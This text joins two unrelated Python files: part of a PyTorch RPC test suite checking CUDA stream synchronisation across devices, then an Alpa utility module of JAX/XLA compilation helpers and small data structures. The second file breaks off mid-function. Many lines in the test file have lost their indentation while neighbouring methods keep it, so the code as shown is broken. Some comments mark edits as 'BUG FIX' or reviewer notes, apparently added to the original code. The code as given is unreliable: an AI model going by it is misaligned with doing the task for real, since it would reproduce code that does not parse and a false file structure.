self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
    def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
        """Check stream sync when the RRef owner reads its own forward output.

        Runs a single-node RPC group ("w0"); only rank 0 participates.
        ``rpc.RRef(output).remote().sum().to_here()`` goes through localValue
        on the owner and must observe the fully-computed forward result.
        """
        if self.rank == 0:
            options = self.rpc_backend_options
            options.set_device_map("w0", {local_device: remote_device})
            rpc.init_rpc(
                "w0",
                rank=0,
                world_size=1,
                rpc_backend_options=options
            )
            # Build the linear layer remotely, then move it via the RRef
            # remote-chaining API onto remote_device.
            model = rpc.remote(
                "w0", torch.nn.Linear, (2048, 20000)
            ).remote().to(remote_device)
            for _ in range(30):
                data = torch.rand(2048, 2048).to(local_device)
                output = model.rpc_sync().forward(data)
                # to_here() internally calls localValue as the caller is
                # the owner of the RRef.
                v0 = rpc.RRef(output).remote().sum().to_here().item()
                v1 = output.sum().item()
                self.assertEqual(v0, v1)
            rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
    @staticmethod
    def _return_tensor_view(i):
        """Return a (100, 200) CUDA tensor view filled with ``i``.

        The artificial stream delay makes a missing sync in return-value
        serialization observable to the caller.
        """
        x = torch.ones(1000, 200).cuda(0) * i
        torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
        # serialization of the return value will create a new tensor from the
        # view, which is done outside of the user function.
        return x.split(100)[0]
    @skip_if_lt_x_gpu(1)
    def test_tensor_view_as_return_value(self):
        """A returned tensor view must be synchronized before serialization.

        ``_return_tensor_view`` computes on a delayed stream; each future
        must still observe the finished values.
        """
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {0 : 0})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        # Launch several overlapping RPCs, then verify each result.
        futs = []
        for i in range(5):
            futs.append(rpc.rpc_async(
                dst,
                TensorPipeAgentCudaRpcTest._return_tensor_view,
                args=(i,)
            ))
        for i in range(5):
            self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
        rpc.shutdown()
    @skip_if_lt_x_gpu(2)
    def test_devices_option_mismatch(self):
        """init_rpc must reject a device map whose source device is not in
        the explicitly configured devices list (map uses 0, devices=[1])."""
        with self.assertRaisesRegex(
            ValueError,
            "Node worker0 has unexpected source devices in its device map for worker1"
        ):
            dst = worker_name((self.rank + 1) % self.world_size)
            options = self.rpc_backend_options
            options.set_device_map(dst, {0 : 0})
            options.set_devices([1])
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=options,
            )
            rpc.shutdown()
    @skip_if_lt_x_gpu(2)
    def test_devices_option_mismatch_reverse(self):
        """init_rpc must reject a device map whose *target* device is not in
        the peer's devices list (map targets 1, devices=[0])."""
        with self.assertRaisesRegex(
            ValueError,
            "Node worker0 has unexpected target devices in its device map for worker1"
        ):
            dst = worker_name((self.rank + 1) % self.world_size)
            # Build fresh options here because device_maps/devices are
            # passed at construction time in this variant.
            options = rpc.TensorPipeRpcBackendOptions(
                init_method=self.rpc_backend_options.init_method,
                num_worker_threads=self.rpc_backend_options.num_worker_threads,
                device_maps={dst: {0 : 1}},
                devices=[0]
            )
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                world_size=self.world_size,
                rpc_backend_options=options,
            )
            rpc.shutdown()
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_as_int(self):
        # Future(devices=...) must accept a bare integer device index.
        fut = Future(devices=[0])
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_as_str(self):
        # Future(devices=...) must accept a device string.
        fut = Future(devices=["cuda:0"])
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_as_device(self):
        # Future(devices=...) must accept a torch.device object.
        fut = Future(devices=[torch.device("cuda", 0)])
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_device_not_cuda(self):
        # Only devices with indices (CUDA) are allowed; CPU must be rejected.
        with self.assertRaisesRegex(
            ValueError, "Expected devices to have indices, got cpu"
        ):
            fut = Future(devices=["cpu"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
    @skip_if_lt_x_gpu(2)
    def test_cuda_future_callback_changes_devices(self):
        """A callback may move the value to another device; the child future
        must still synchronize with the parent's fill stream."""
        # We check proper CUDA stream synchronization by filling the tensor with
        # the expected value in one stream, and reading it from another stream.
        tensor0 = torch.zeros((100,), device="cuda:0")
        tensor1 = torch.zeros((100,), device="cuda:1")
        parent_future = Future(devices=["cuda:0", "cuda:1"])
        def cb(fut):
            # Copy the parent's result onto the second device.
            t0 = fut.value()
            tensor1.copy_(t0, non_blocking=True)
            return tensor1
        child_future = parent_future.then(cb)
        with torch.cuda.device("cuda:0"):
            stream = torch.cuda.Stream()
            with torch.cuda.stream(stream):
                # Delay the fill so a missing sync would be observable.
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor0.fill_(1)
                parent_future.set_result(tensor0)
        with torch.cuda.device("cuda:1"):
            another_stream = torch.cuda.Stream()
            with torch.cuda.stream(another_stream):
                self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
    @skip_if_lt_x_gpu(2)
    def test_cuda_future_value_on_bad_device(self):
        """Setting a result on a device not declared to the Future must raise,
        while independent callbacks still complete successfully."""
        tensor0 = torch.zeros((100,), device="cuda:0")
        tensor1 = torch.zeros((100,), device="cuda:1")
        parent_future = Future(devices=["cuda:1"])
        # As a plus, we test that futures still invoke callbacks even in case of
        # error, and that the child futures are successful if those callbacks
        # don't access the parent future.
        def cb(fut):
            with torch.cuda.device("cuda:1"):
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor1.fill_(1)
                return tensor1
        child_future = parent_future.then(cb)
        with torch.cuda.device("cuda:0"):
            stream = torch.cuda.Stream()
            with torch.cuda.stream(stream):
                torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
                tensor0.fill_(1)
                # cuda:0 is not among the declared devices (only cuda:1).
                parent_future.set_result(tensor0)
        with self.assertRaisesRegex(
            ValueError,
            r"The result contained tensors residing on device\(s\) cuda:0 "
            r"which are not among the expected device\(s\) cuda:1",
        ):
            parent_future.wait()
        with torch.cuda.device("cuda:1"):
            another_stream = torch.cuda.Stream()
            with torch.cuda.stream(another_stream):
                self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
    @skip_if_lt_x_gpu(1)
    def test_async_execution_with_cuda_future(self):
        """Futures returned by @async_execution functions must carry CUDA
        stream synchronization: the waiter reads on a fresh stream."""
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {"cuda:0": "cuda:0"})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        t = torch.zeros((100,), device="cuda:0")
        fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
        another_stream = torch.cuda.Stream("cuda:0")
        with torch.cuda.stream(another_stream):
            self.assertTrue(torch.eq(fut.wait(), 1).all().item())
        rpc.shutdown()
    @skip_if_lt_x_gpu(1)
    def test_async_execution_nested_with_cuda_future(self):
        """Nested @async_execution RPC (dst forwards to nested_dst) must still
        deliver a correctly synchronized CUDA result: a+b+c == 3."""
        dst = worker_name((self.rank + 1) % self.world_size)
        nested_dst = worker_name((self.rank + 2) % self.world_size)
        options = self.rpc_backend_options
        # Only the first hop's device map is set here; the nested hop is
        # presumably configured on dst's side — confirm in the helper.
        options.set_device_map(dst, {"cuda:0": "cuda:0"})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        a = torch.ones((100,), device="cuda:0")
        b = torch.ones((100,), device="cuda:0")
        c = torch.ones((100,), device="cuda:0")
        fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
        another_stream = torch.cuda.Stream("cuda:0")
        with torch.cuda.stream(another_stream):
            self.assertTrue(torch.eq(fut.wait(), 3).all().item())
        rpc.shutdown()
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_modify_tensor_inplace(self):
        """Mutating a completed Future's tensor in place must not crash."""
        tensor = torch.zeros((100,), device="cuda:0")
        future = Future(devices=["cuda:0"])
        future.set_result(tensor)
        # It's weird to modify the value of a future once it's complete, but
        # technically possible. Currently this is considered undefined behavior
        # (in practice the future will ignore the modification and still
        # synchronize with the original value). We could one day add logic to
        # detect and warn or throw in such cases, but for now we just check that
        # this doesn't crash.
        tensor.fill_(1)
        future.wait()
    @skip_if_lt_x_gpu(1)
    def test_cuda_future_replace_tensor(self):
        """Replacing (and thus deleting) a completed Future's tensor must not
        crash, even though it invalidates the Future's cached info."""
        tensor_list = [torch.zeros((100,), device="cuda:0")]
        future = Future(devices=["cuda:0"])
        future.set_result(tensor_list)
        # It's weird to modify the value of a future once it's complete, but
        # technically possible. Currently this is considered undefined behavior
        # (in practice the future will ignore the modification and still
        # synchronize with the original value). We could one day add logic to
        # detect and warn or throw in such cases, but for now we just check that
        # this doesn't crash.
        # We set things up so that the original tensor contained in the list
        # gets deleted once we replace it with the other one. This will
        # invalidate any cached information held by the future.
        tensor_list[0] = torch.ones((100,), device="cuda:0")
        future.wait()
    @skip_if_lt_x_gpu(1)
    def test_rref_with_unpickleable_attributes(self):
        """RRef method calls must work on remote objects holding CUDA state
        (TensorWrapper): increase by 1 on 42 zeros, sum must be 42."""
        dst = worker_name((self.rank + 1) % self.world_size)
        options = self.rpc_backend_options
        options.set_device_map(dst, {"cuda:0": "cuda:0"})
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=options,
        )
        rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
        rref.rpc_sync().increase(1)
        ret = rref.rpc_sync().sum()
        self.assertEqual(ret, 42)
        rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
|
util.py | # pylint: disable=consider-using-enumerate
"""Common utilities."""
import functools
import itertools as it
import logging
import os
import subprocess
import re
import time
from collections import OrderedDict
from functools import partial, partialmethod
import threading
from typing import Sequence, Any, Union
from warnings import warn
import jax
import jax.numpy as jnp
from jax._src import dispatch
from jax._src.api import FLAGS, ShapeDtypeStruct
from jax._src.dlpack import from_dlpack, to_dlpack
from jax._src.lib import xla_bridge as xb, xla_client as xc, xla_extension as xe
from jax.api_util import shaped_abstractify
from jax.core import (Atom, ClosedJaxpr, DropVar, Jaxpr, JaxprEqn, Literal,
ShapedArray, Var, AbstractValue)
from jax.experimental.maps import FrozenDict
from jax import linear_util as lu
from jax.interpreters import partial_eval as pe
from jax.interpreters import xla, pxla
from jax.interpreters.xla import _DeviceArray
from jax.tree_util import tree_map, tree_flatten, PyTreeDef
import numpy as np
import flax
from flax.training import train_state
import ray
import tqdm
import cupy as cp
from alpa.global_env import global_config, is_worker
########################################
##### Alpa API Utilities
########################################
# Module-level logger shared by the helpers in this file.
logger = logging.getLogger(__name__)
def freeze_dict(pytree: PyTreeDef):
    """Convert every plain ``dict`` node of a pytree into a ``FrozenDict``.

    Args:
        pytree: Any pytree. ``dict`` nodes are treated as leaves so they can
            be frozen wholesale instead of being traversed.

    Returns:
        The pytree with each ``dict`` replaced by a ``FrozenDict``.
    """

    def is_leaf(x):
        return isinstance(x, dict)

    def freeze(x):
        if isinstance(x, dict):
            return FrozenDict(x)
        return x

    # BUG FIX: ``is_leaf`` must be passed by keyword. The third *positional*
    # argument of ``tree_map`` is interpreted as an additional pytree, which
    # made the previous call fail (or silently misbehave).
    return tree_map(freeze, pytree, is_leaf=is_leaf)
def auto_static_argnums(args: Sequence[Any]):
    """Return the indices of static arguments according to heuristic rules.

    An argument is static when it is a plain Python scalar/string, or when
    any of its pytree leaves cannot be abstractified into an array value.
    """

    def is_static_arg(arg):
        # Plain Python scalars and strings are compile-time constants.
        if isinstance(arg, (bool, int, float, str)):
            return True
        # Optimizer / train state containers always hold array data.
        if isinstance(arg, (flax.optim.base.Optimizer, train_state.TrainState)):
            return False
        # Otherwise: static iff some leaf is not abstractifiable.
        xs, _ = tree_flatten(arg)
        for x in xs:
            try:
                x = shaped_abstractify(x)
            except TypeError:
                return True
        return False

    return tuple(i for i in range(len(args)) if is_static_arg(args[i]))
def auto_donate_argnums(args: Sequence[Any]):
    """Return the indices of donated arguments according to heuristic rules."""

    def should_donate(x):
        # Optimizer and train-state buffers are always donated.
        return isinstance(x, (flax.optim.base.Optimizer, train_state.TrainState))

    return tuple(i for i, arg in enumerate(args) if should_donate(arg))
def abstractify_with_aval(x):
    """Return an abstract value (aval) for ``x``.

    ShapedArray passes through unchanged; ShapeDtypeStruct keeps its
    named_shape; anything else is delegated to ``xla.abstractify``.
    """
    if isinstance(x, ShapedArray):
        return x
    elif isinstance(x, ShapeDtypeStruct):
        return ShapedArray(x.shape, x.dtype, named_shape=x.named_shape)
    else:
        return xla.abstractify(x)
def tree_to_nparray(tree):
    """Convert a pytree to a pytree of numpy array."""

    def convert_to_nparray(leaf):
        # Materialize anything exposing the numpy array protocol.
        return np.asanyarray(leaf) if hasattr(leaf, "__array__") else leaf

    return tree_map(convert_to_nparray, tree)
def update_jax_platform(platform):
    """Update the jax backend platform."""
    jax.config.update("jax_platform_name", platform)
    # get_backend is memoized; clear the cache so the new platform takes
    # effect for subsequent lookups.
    xb.get_backend.cache_clear()
########################################
##### Data Structure Utilities
########################################
def to_int_tuple(array: np.ndarray):
    """Convert a numpy array to int tuple."""
    if array is None:
        return ()
    return tuple(map(int, array))
def check_arithmetic_sequence(array: np.ndarray):
    """Check whether the input 1-D array is an arithmetic sequence.

    Returns:
        The common difference if it is; ``None`` otherwise (including when
        the array has fewer than two elements).
    """
    if len(array) < 2:
        return None
    delta = array[1] - array[0]
    # Every consecutive difference must match the first one.
    if all(array[i] - array[i - 1] == delta for i in range(2, len(array))):
        return delta
    return None
class OrderedSet:
    """An ordered set implemented by using the built-in OrderedDict.

    Iteration follows insertion order. Supports the set operators
    ``| & - ^`` and their in-place variants.
    """

    def __init__(self, iterable=()):
        self.dict = OrderedDict()
        for element in iterable:
            self.dict[element] = None

    def add(self, *args):
        """Add one or more elements."""
        for x in args:
            self.dict[x] = None

    def update(self, other):
        """Add every element of another iterable."""
        for x in other:
            self.dict[x] = None

    def union(self, other):
        """Return a new set with elements from both sets."""
        result = OrderedSet()
        result.update(self)
        result.update(other)
        return result

    def intersection_update(self, other):
        """Keep only elements that are also in ``other``."""
        to_be_removed = []
        for x in self:
            if x not in other:
                to_be_removed.append(x)
        for x in to_be_removed:
            self.remove(x)

    def intersection(self, other):
        """Return a new set with elements common to both sets."""
        result = OrderedSet()
        for x in self:
            if x in other:
                result.add(x)
        return result

    def discard(self, element):
        """Remove ``element`` if present; do nothing otherwise."""
        if element in self:
            del self.dict[element]

    def remove(self, element):
        """Remove ``element``; raise KeyError if absent."""
        if element not in self:
            raise KeyError(element)
        del self.dict[element]

    def clear(self):
        self.dict.clear()

    def difference(self, other):
        """Return a new set with elements of self not in ``other``."""
        result = OrderedSet()
        for x in self:
            if x not in other:
                result.add(x)
        return result

    def difference_update(self, other):
        """Remove every element of ``other`` from self."""
        for x in other:
            self.discard(x)

    def symmetric_difference(self, other):
        """Return a new set with elements in exactly one of the two sets."""
        result = OrderedSet()
        for x in self:
            if x not in other:
                result.add(x)
        for x in other:
            if x not in self:
                result.add(x)
        return result

    def __iter__(self):
        yield from self.dict

    def __len__(self):
        return len(self.dict)

    def __contains__(self, element):
        return element in self.dict

    def __repr__(self):
        return "OrderedSet([" + ", ".join(repr(x) for x in self) + "])"

    def __or__(self, other):
        return self.union(other)

    def __and__(self, other):
        return self.intersection(other)

    def __sub__(self, other):
        return self.difference(other)

    def __xor__(self, other):
        return self.symmetric_difference(other)

    # BUG FIX: augmented-assignment dunders must return the updated object;
    # previously they returned None, so ``s |= t`` rebound ``s`` to None.
    def __ior__(self, other):
        self.update(other)
        return self

    def __iand__(self, other):
        self.intersection_update(other)
        return self

    def __isub__(self, other):
        self.difference_update(other)
        return self

    def __eq__(self, other):
        if isinstance(other, OrderedSet):
            return self.dict == other.dict
        return False

    @classmethod
    def __class_getitem__(cls, item):
        # Support ``OrderedSet[int]``-style annotations.
        return f"{cls.__name__}[{item.__name__}]"
class DisjointDict:
    """A dictionary for recursive lookup.
    Path compression is used to avoid excess of maximum recursion depth."""

    def __init__(self):
        self.values = {}

    def update(self, keys, values):
        """Record ``key -> value`` links pairwise."""
        for key, value in zip(keys, values):
            self.values[key] = value

    def recursive_lookup(self, key):
        """Follow links from ``key`` to its terminal value, compressing the path."""
        # Phase 1: walk the chain until a node with no outgoing link.
        path = []
        node = key
        while node in self.values:
            path.append(node)
            node = self.values[node]
        # Phase 2: point every visited node directly at the terminal value.
        for visited in path:
            self.values[visited] = node
        return node

    def keys(self):
        return list(self.values.keys())
def cached_property(fn, *args, **kwargs):
    """
    Decorator to make a function a "cached property".
    This means that it is a property whose return value is cached after the
    first time it is called.
    Args:
        fn: The function to be made a cached property
        *args: Any args for the function
        **kwargs: Any kwargs for the function
    Returns:
        function
    """
    # NOTE(review): ``functools.lru_cache()`` returns a decorator that takes
    # exactly one callable, so non-empty *args/**kwargs here would raise a
    # TypeError — presumably this is only ever used bare; confirm callers.
    # NOTE(review): lru_cache on a method keys on ``self`` and keeps every
    # instance alive for the cache's lifetime (flake8-bugbear B019).
    return property(functools.lru_cache()(fn, *args, **kwargs))
########################################
##### XLA API Utilities
########################################
def get_compile_options(num_replicas: int, num_partitions: int,
                        device_assignment: np.ndarray,
                        use_spmd_partitioning: bool,
                        parameter_is_tupled_arguments: bool,
                        build_random_seed: int):
    """Return CompileOptions for XLA compilation.

    Args:
        num_replicas: Number of replicas.
        num_partitions: Number of SPMD partitions.
        device_assignment: Device-id matrix handed to XLA.
        use_spmd_partitioning: Whether to enable SPMD partitioning.
        parameter_is_tupled_arguments: Whether parameters are packed into a
            single tuple argument.
        build_random_seed: Seed stored in the executable build options.
    """
    compile_options = xb.get_compile_options(
        num_replicas=num_replicas,
        num_partitions=num_partitions,
        device_assignment=device_assignment,
        use_spmd_partitioning=use_spmd_partitioning,
    )
    compile_options.parameter_is_tupled_arguments = (
        parameter_is_tupled_arguments)
    compile_options.executable_build_options.seed = build_random_seed
    return compile_options
def jaxpr_to_hlo_module(name: str, closed_jaxpr: ClosedJaxpr,
                        donated_invars: Sequence[bool], backend):
    """Convert a jaxpr to an XLA HloModule.
    Reference code: jax/jax/_src/dispatch.py::lower_xla_callable

    Args:
        name: Name of the resulting XLA computation.
        closed_jaxpr: The jaxpr to lower.
        donated_invars: Per-invar flags marking buffers donated to XLA.
        backend: The XLA backend used for platform-specific lowering.
    """
    backend_name = backend.platform
    in_avals = [var.aval for var in closed_jaxpr.jaxpr.invars]
    consts = closed_jaxpr.consts
    # BUG FIX: the previous ``map(dispatch.prefetch, ...)`` produced a lazy
    # iterator that was never consumed, so no prefetch ever happened.
    # Iterate eagerly instead.
    for value in it.chain(consts, dispatch.jaxpr_literals(closed_jaxpr.jaxpr)):
        dispatch.prefetch(value)
    # Convert jaxpr to XLA HLO
    tuple_args = False
    axis_env = xla.AxisEnv(nreps=1, names=(), sizes=())
    name_stack = xla.new_name_stack(xla.wrap_name(name, "parallelize"))
    c = xc.XlaBuilder(name)
    xla_consts = xla._xla_consts(c, consts)  # pylint: disable=protected-access
    xla_args, donated_invars = xla._xla_callable_args(  # pylint: disable=protected-access
        c,
        in_avals,
        tuple_args,
        donated_invars=donated_invars)
    ctx = xla.TranslationContext(c, backend_name, axis_env, name_stack)
    out_nodes = xla.jaxpr_subcomp(ctx, closed_jaxpr.jaxpr, xla_consts,
                                  *xla_args)
    out_tuple = xc.ops.Tuple(c, out_nodes)
    # Set up aliases (donating invars)
    if donated_invars:
        if backend.platform in ("gpu", "tpu"):
            # set_up_aliases returns the donations that could NOT be used;
            # the warning below is guarded by this branch so that
            # donation_results is always defined when inspected.
            donation_results = xla.set_up_aliases(c, xla_args,
                                                  c.GetShape(out_tuple),
                                                  donated_invars, tuple_args)
            if any(donation_results):
                unused_donations = [
                    str(c.GetShape(a))
                    for a, d in zip(xla_args, donation_results)
                    if d
                ]
                warn_msg = ", ".join(unused_donations)
                warn(f"Some donated buffers were not usable: {warn_msg}")
    return c.build(out_tuple).as_hlo_module()
def setup_computation_alias(xla_computation: Union[xc.XlaComputation,
                                                   xe.HloModule],
                            donated_invars: Sequence[bool]):
    """Set input/output alias in xla computation.
    Assume the tensors in output tuple strictly match the donated parameters.
    """
    program_shape = xla_computation.program_shape()
    parameter_shapes = program_shape.parameter_shapes()
    result_shapes = program_shape.result_shape().tuple_shapes()
    assert len(parameter_shapes) == len(donated_invars), (
        "Zhuohan: This error might be caused by an error in "
        "XLA stage slicing.")
    # Two-pointer scan: each donated parameter is matched, in order, to the
    # next output of identical shape; non-matching outputs are skipped.
    p_in = 0
    p_out = 0
    while p_in < len(parameter_shapes) and p_out < len(result_shapes):
        if donated_invars[p_in]:
            if parameter_shapes[p_in] == result_shapes[p_out]:
                # Output element p_out reuses parameter p_in's buffer.
                xla_computation.setup_alias((p_out,), p_in, ())
                p_in += 1
                p_out += 1
            else:
                p_out += 1
        else:
            p_in += 1
    # Donated parameters without a matching output only trigger a warning.
    while p_in < len(parameter_shapes):
        if donated_invars[p_in]:
            warn("Some vars are not donated")
        p_in += 1
def count_communication_primitives(hlo_ir: str,
                                   ignore_scalar_all_reduce: bool = False):
    """Count the communication primitives in a HLO IR."""

    def count_op(op_name):
        # Count both the synchronous op and its async "-start" form.
        return hlo_ir.count(op_name + "(") + hlo_ir.count(op_name + "-start(")

    total = hlo_ir.count("channel_id")
    all_reduce = count_op("all-reduce")
    all_gather = count_op("all-gather")
    reduce_scatter = count_op("reduce-scatter")
    all_to_all = count_op("all-to-all")
    if ignore_scalar_all_reduce:
        # Ignore allreduce of scalar values
        scalar_patterns = ("all-reduce(f32[]", "all-reduce-start(f32[]",
                           "all-reduce(f16[]", "all-reduce-start(f16[]")
        scalar_all_reduce = sum(hlo_ir.count(p) for p in scalar_patterns)
        total -= scalar_all_reduce
        all_reduce -= scalar_all_reduce
    return total, all_reduce, all_gather, reduce_scatter, all_to_all
def compile_dummy_zero_constant(backend, num_devices: int):
    """Compile an XLA executable that returns a constant zero."""
    c = xc.XlaBuilder("dummy_zero_constant")
    # Replicate the scalar across all partitions.
    sharding = xc.OpSharding()
    sharding.type = sharding.type.REPLICATED
    c.set_sharding(sharding)
    zero = xc.ops.Constant(c, np.array(0, dtype=np.dtype(np.int32)))
    c.clear_sharding()
    c = c.build(xc.ops.Tuple(c, [zero]))
    # One replica, SPMD-partitioned over all local devices.
    compile_options = xb.get_compile_options(
        num_replicas=1,
        num_partitions=num_devices,
        device_assignment=np.arange(num_devices).reshape((1, -1)),
        use_spmd_partitioning=True,
    )
    compiled = backend.compile(c, compile_options)
    return compiled
def compile_allocate_zero_buffers(backend, num_devices: int,
                                  shapes: Sequence[Sequence[int]],
                                  dtypes: Sequence[jnp.dtype]):
    """Compile an XLA executable that returns zero buffers with given shape and
    dtypes."""
    c = xc.XlaBuilder("allocate_zero_buffers")
    # All outputs are replicated across partitions.
    sharding = xc.OpSharding()
    sharding.type = sharding.type.REPLICATED
    c.set_sharding(sharding)
    ret = []
    for shape, dtype in zip(shapes, dtypes):
        # Broadcast a scalar zero to the requested shape.
        zero = xc.ops.Constant(c, np.array(0, dtype=dtype))
        zero = xc.ops.Broadcast(zero, shape)
        ret.append(zero)
    c.clear_sharding()
    c = c.build(xc.ops.Tuple(c, ret))
    compile_options = xb.get_compile_options(
        num_replicas=1,
        num_partitions=num_devices,
        device_assignment=np.arange(num_devices).reshape((1, -1)),
        use_spmd_partitioning=True,
    )
    compiled = backend.compile(c, compile_options)
    return compiled
def compile_memset_zero_buffers(backend, num_devices: int,
                                shapes: Sequence[Sequence[int]],
                                dtypes: Sequence[jnp.dtype]):
    """
    Compile an XLA executable that memset zero buffers with given shape and
    dtypes. Try to avoid memcpy
    """
    # NOTE(review): the builder name below looks copied from
    # compile_allocate_zero_buffers — harmless but possibly unintended.
    c = xc.XlaBuilder("allocate_zero_buffers")
    args = []
    sharding = xc.OpSharding()
    sharding.type = sharding.type.REPLICATED
    c.set_sharding(sharding)
    # Declare the buffers to zero as parameters so XLA writes in place.
    for shape, dtype in zip(shapes, dtypes):
        args.append(
            xc.ops.Parameter(c, len(args),
                             xc.shape_from_pyval(np.ones(shape, dtype))))
    # The parameter tuple carries one replicated sharding per buffer.
    sharding_tuple = xc.OpSharding()
    sharding_tuple.type = sharding.type.TUPLE
    sharding_tuple.tuple_shardings = [sharding for _ in shapes]
    c.set_sharding(sharding_tuple)
    input_params = xc.ops.Tuple(c, args)
    c.set_sharding(sharding)
    # The custom call zeroes the operands; its own result is a dummy scalar.
    output_shape = xc.Shape.scalar_shape(np.dtype(np.float32))
    output_tuple = xc.ops.CustomCall(c,
                                     b"__builtin$MemZero",
                                     operands=(input_params,),
                                     shape=output_shape)
    c = c.build(output_tuple)
    compile_options = xb.get_compile_options(
        num_replicas=1,
        num_partitions=num_devices,
        device_assignment=np.arange(num_devices).reshape((1, -1)),
        use_spmd_partitioning=True,
    )
    compiled = backend.compile(c, compile_options)
    return compiled
def compile_concatenate(backend, mesh_shape, sharding_spec, batch_size,
                        batch_dim, aval):
    """Compile an executable that concatenates ``batch_size`` arrays of
    abstract value ``aval`` along ``batch_dim``.

    Returns:
        The serialized HLO module proto of the compiled executable.
    """
    num_devices = np.prod(mesh_shape)
    # Lower the given pxla sharding spec to an XLA OpSharding proto.
    sharding = pxla.sharding_spec_sharding_proto(sharding_spec)
    build_random_seed = global_config.compile_random_seed
    compile_options = get_compile_options(
        num_replicas=1,
        num_partitions=num_devices,
        device_assignment=np.arange(num_devices).reshape((1, -1)),
        use_spmd_partitioning=True,
        parameter_is_tupled_arguments=False,
        build_random_seed=build_random_seed)
    c = xc.XlaBuilder("concatenate buffers")
    c.set_sharding(sharding)
    # One parameter per micro-batch shard, all with the same aval.
    operands = []
    for batch_idx in range(batch_size):
        operands.append(
            xc.ops.Parameter(
                c, batch_idx,
                xc.shape_from_pyval(np.ones(aval.shape, aval.dtype))))
    concated = xc.ops.ConcatInDim(c, operands, batch_dim)
    c = c.build(concated)
    compiled = backend.compile(c, compile_options)
    hlo_proto = compiled.hlo_modules()[0].as_serialized_hlo_module_proto()
    return hlo_proto
def get_shard_shape(aval: ShapedArray, sharding_spec: pxla.ShardingSpec):
    """Return the shape of a shard."""
    shard_dims = []
    for dim_size, dim_spec in zip(aval.shape, sharding_spec.sharding):
        if isinstance(dim_spec, pxla.Chunked):
            # Each shard holds 1/prod(chunks) of this dimension.
            shard_dims.append(dim_size // np.prod(dim_spec.chunks))
        elif isinstance(dim_spec, pxla.Unstacked):
            shard_dims.append(dim_spec.size)
        elif isinstance(dim_spec, pxla.NoSharding):
            shard_dims.append(dim_size)
    return tuple(shard_dims)
def get_microbatch_sharding_spec(spec: pxla.ShardingSpec, batch_dim,
                                 num_micro_batch):
    """Derive a micro-batch sharding spec from a full-batch spec.

    The batch dimension gains an outermost chunking of ``num_micro_batch``;
    the mesh mapping is adjusted so existing sharded axes at or after the
    inserted chunk axis shift by one, and a ShardedAxis for the new chunk is
    appended.
    """
    batch_dim_chunks = [num_micro_batch]
    if isinstance(spec.sharding[batch_dim], pxla.Chunked):
        # Keep any pre-existing chunking inside the micro-batch split.
